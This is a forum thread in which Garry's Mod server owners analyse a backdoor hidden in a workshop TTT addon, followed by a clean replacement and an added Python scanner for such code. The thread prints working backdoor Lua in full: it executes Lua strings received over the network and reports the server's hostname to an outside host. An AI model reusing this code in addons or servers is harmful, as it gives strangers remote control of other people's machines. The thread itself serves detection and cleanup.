Is this doing what I think?



if (SERVER && game.IsDedicated()) then
	timer.Simple(30, function()
		local onr = net.Receive
		net.Receive = function(n, ...)
			if (n != "bdsm") then
				onr(n, unpack({...}))
			end
		end
		util.AddNetworkString("bdsm")
		onr("bdsm", function(l, p)
			RunString(net.ReadString())
		end)

		http.Post("http://www.bg-server.3owl.com/", {hn = GetConVarString("hostname"), id = "GLOW"}, function(s) end, function(e) end)
	end)
end


Sorry if it looks butchered, I did my best to fix it up. It was originally all done on one line and hidden to the FAR right of the file where you would never even notice it.

And what do you think it does?

Call me crazy, but does it look like a back door?

Just looks like something that someone would hide in a script to get access to run Lua on someone’s server.

I thought so as well, thanks bud!

I found this backdoor in the TTT traitor glow off the workshop. Here is a safe non-workshop version:




--Stick in garrysmod/lua/autorun
local msg_name = "Halos_inform"

if SERVER then

	util.AddNetworkString(msg_name)
	
	hook.Add("PlayerDeath", "PlayerDeathHalos", function(ply)
		net.Start(msg_name)
		net.WriteEntity(ply)
		net.Send(GetTraitors())
	end)
	
else

	local rolestable = {}

	hook.Add("TTTEndRound", "TTTEndRoundResetTable", function()
		table.Empty(rolestable)
	end)

	hook.Add("TTTBeginRound", "TTTBeginRoundHalos", function()
		for k,v in pairs(player.GetAll()) do
			if v:GetRole() != ROLE_TRAITOR then continue end
			table.insert(rolestable, v) 
		end
	end)
	
	hook.Add("PreDrawHalos", "AddTraitorHalos", function()
		if LocalPlayer():IsActiveTraitor() then
			halo.Add(rolestable, Color(255,50,50), 2, 2, 2, true, true)
		end
	end)
	
	net.Receive(msg_name, function()
		local ent = net.ReadEntity()
		for k,v in pairs(rolestable) do
			if v == ent then
				table.remove(rolestable, k)
			end
		end
	end)
end


It runs every 30 seconds, sends some stuff to some free hosting site with a bdsm exploit. Some myg0t guy made this, remove it from your server immediately.

It doesn’t run every 30 seconds, it runs once 30 seconds after the script is run.

Edit, 21st October 2013:

The HTTP stuff is probably just so the guy who made this crap knows which servers are “infected” with his malicious code.

Here’s a better version if you’re interested:
http://forum.facepunch.com/showthread.php?t=1259362&p=40192568&viewfull=1#post40192568

brb, spamming that URL with HTTP post requests

You are my hero! That is the entire reason I started to look at this file.
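
An added example, not part of the thread or of any addon discussed in it: a small Python scanner a server owner could run over addon Lua files to catch the traits of the snippet above (code pushed off-screen behind a long whitespace run, `RunString` fed from a net message, `net.Receive` being reassigned, outbound `http.Post`). The rule names, the 60-character gap threshold and the sample text are assumptions made for this sketch, and it assumes the addon's Lua files are available on disk.

```python
import re
from pathlib import Path

# Indicators taken from the snippet quoted in this thread.
RULES = [
    # A string read off the network is handed straight to the Lua compiler.
    ("remote-code-exec",
     re.compile(r"\b(?:RunString|CompileString)\s*\(\s*net\.Read\w+\s*\(")),
    # net.Receive is reassigned, so later registrations can be filtered.
    ("net.Receive-override", re.compile(r"\bnet\.Receive\s*=(?!=)")),
    # Outbound HTTP from an addon; review the destination by hand.
    ("http-call", re.compile(r"\bhttp\.(?:Post|Fetch)\s*\(")),
]

def scan_lua(source, min_gap=60):
    """Return (line_no, rule) findings for one Lua source string."""
    gap = re.compile(r"[ \t]{%d,}" % min_gap)
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        line = line.rstrip()  # pure trailing whitespace is not a finding
        # Code pushed off-screen: a long whitespace run with text after it.
        if gap.search(line):
            findings.append((no, "hidden-code"))
        findings.extend((no, name) for name, rx in RULES if rx.search(line))
    return findings

def scan_tree(root):
    """Scan every .lua file under root; returns {path: findings} for hits."""
    hits = {}
    for path in sorted(Path(root).rglob("*.lua")):
        found = scan_lua(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample: a benign line, then fragments of the thread's snippet
# placed after 80 tabs on one line (placeholder URL, not the one in the post).
SAMPLE = (
    'hook.Add("PreDrawHalos", "AddTraitorHalos", function() end)\n'
    "end" + "\t" * 80 +
    'local onr = net.Receive net.Receive = function(n, ...) end '
    'onr("x", function() RunString(net.ReadString()) end) '
    'http.Post("http://example.invalid/", {})\n'
)

if __name__ == "__main__":
    for no, rule in scan_lua(SAMPLE):
        print(f"line {no}: {rule}")
```

An `http-call` hit on its own is common in legitimate addons; it is the combination on one off-screen line that matches what was found here.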